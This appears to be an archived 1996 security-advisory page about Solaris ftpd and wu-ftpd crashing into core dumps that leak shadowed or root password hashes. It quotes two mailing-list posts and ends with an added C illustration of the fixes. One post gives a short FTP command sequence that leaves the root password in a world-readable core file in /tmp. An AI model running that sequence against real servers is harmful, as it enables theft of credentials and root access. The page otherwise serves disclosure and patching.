Solaris ftpd (as well as others) can be made to core dump and divulge shadowed passwords
Can obtain the crypt()ed root password
Solaris (at least 2.5) and others, including wu.ftpd. If the enclosed procedure doesn't work, try killing the process yourself.
15 October 1996
From: Martin Rex (firstname.lastname@example.org)
Date: Tue, 15 Oct 1996 18:14:08 -0400
James Poland 6-5251 wrote:
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so they seem to have used the proposed fix:
checking for "pw != NULL".
So this proposal was simple and obvious ... and incomplete. :)
Addendum: Other ftpd bugs:
From: Vadim Kolontsov (email@example.com)
Date: Tue, 15 Oct 1996 08:41:40 +0300
wuftpd can create a core dump in the following two situations too (yes, the dump
will contain some subset of shadowed passwords):
1) "pasv" given when user not logged in
(caused by error in passive())
2) more than 100 arguments to any executable command (for example, "list")
(caused by error in ftpd_popen())
The first error is present in almost all versions of BSD's ftpd, wu-ftpd and
derivatives. The second error is present in all versions of BSD's ftpd, wu-ftpd and
derivatives (as far as I know).
Bugfixes are simple: checking for "pw != NULL" in the first case, and
checking for "argc < 100" in the other (see sources).
Best regards, Vadim.
P.S. By the way, who knows the e-mail of the wu-ftpd developer? Mail me, please...
Vadim Kolontsov SysAdm/Programmer
Tver Regional Center of New Information Technologies Networks Lab
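Both messages above come down to the same two missing checks: a PASV handler that dereferences the passwd pointer before any login has set it, and an argument splitter with no upper bound on argc. The C below is an added illustration written for this page, not code from Sun's ftpd or wu-ftpd; every name in it (ftp_session, handle_pasv, build_argv, pasv_reply_code, args_accepted) is assumed, and the core-dump limit at the end is an extra mitigation the thread does not mention.

```c
/* Added illustration, not code from Sun's ftpd or wu-ftpd: the two guards the
 * thread names ("pw != NULL" before PASV, "argc < 100" when splitting command
 * arguments), plus one extra mitigation the thread does not mention.
 * Every name below (ftp_session, handle_pasv, build_argv, ...) is assumed. */
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

#define MAX_ARGS 100            /* bound quoted in the thread: argc < 100 */

/* Stand-in for struct passwd; a real daemon fills this from getpwnam(). */
struct pw_entry { const char *name; const char *dir; };

struct ftp_session {
    const struct pw_entry *pw;  /* stays NULL until USER/PASS succeeded */
};

/* PASV handler with the missing check added. The bug described in the
 * thread was dereferencing pw here while it was still NULL (PASV before
 * login, or after a failed USER), which killed the daemon with SIGSEGV and
 * left a core file containing whatever password data it had read. */
int handle_pasv(const struct ftp_session *s, char *reply, size_t n)
{
    if (s->pw == NULL) {                     /* the "pw != NULL" guard */
        snprintf(reply, n, "530 Please login with USER and PASS.");
        return 530;
    }
    snprintf(reply, n, "227 Entering Passive Mode (user %s)", s->pw->name);
    return 227;
}

/* Splits a command line into argv[] without ever writing past max_args
 * entries; returns argc, or -1 when the line holds too many words. The
 * ftpd_popen() bug was the absence of this bound: a command with more than
 * 100 arguments overran a fixed-size array. Modifies line in place. */
int build_argv(char *line, char *argv[], int max_args)
{
    int argc = 0;
    char *p = line;
    while (*p != '\0') {
        while (*p == ' ' || *p == '\t' || *p == '\r' || *p == '\n') p++;
        if (*p == '\0') break;
        if (argc >= max_args - 1)           /* keep one slot for the NULL */
            return -1;                      /* reject, do not overrun */
        argv[argc++] = p;
        while (*p != '\0' && *p != ' ' && *p != '\t' && *p != '\r' && *p != '\n') p++;
        if (*p != '\0') *p++ = '\0';
    }
    argv[argc] = NULL;                      /* execv() needs the terminator */
    return argc;
}

/* Extra mitigation, not from the thread: a daemon that handles credentials
 * should not leave core files at all. Returns 0 on success. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Helpers with constructed inputs so the behaviour can be checked. */
int pasv_reply_code(int logged_in)
{
    static const struct pw_entry user = { "alice", "/home/alice" };
    struct ftp_session s = { logged_in ? &user : NULL };
    char reply[128];
    return handle_pasv(&s, reply, sizeof reply);
}

int args_accepted(int nwords)          /* constructed "LIST a a a ..." line */
{
    char line[4096] = "";
    char *argv[MAX_ARGS];
    for (int i = 0; i < nwords && strlen(line) + 3 < sizeof line; i++)
        strcat(line, i == 0 ? "LIST" : " a");
    return build_argv(line, argv, MAX_ARGS);
}

int main(void)
{
    printf("PASV before login -> %d\n", pasv_reply_code(0));   /* 530 */
    printf("PASV after login  -> %d\n", pasv_reply_code(1));   /* 227 */
    printf("99 words  -> argc %d\n", args_accepted(99));        /* 99 */
    printf("100 words -> argc %d\n", args_accepted(100));       /* -1 */
    printf("core dumps disabled: %s\n", disable_core_dumps() == 0 ? "yes" : "no");
    return 0;
}
```

The argv bound rejects the whole command rather than silently truncating it, which is the safer choice for a daemon that later hands argv to execv(); the core-dump limit is defence in depth for the case where some other crash path is still reachable.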
This page is part of Fyodor's exploit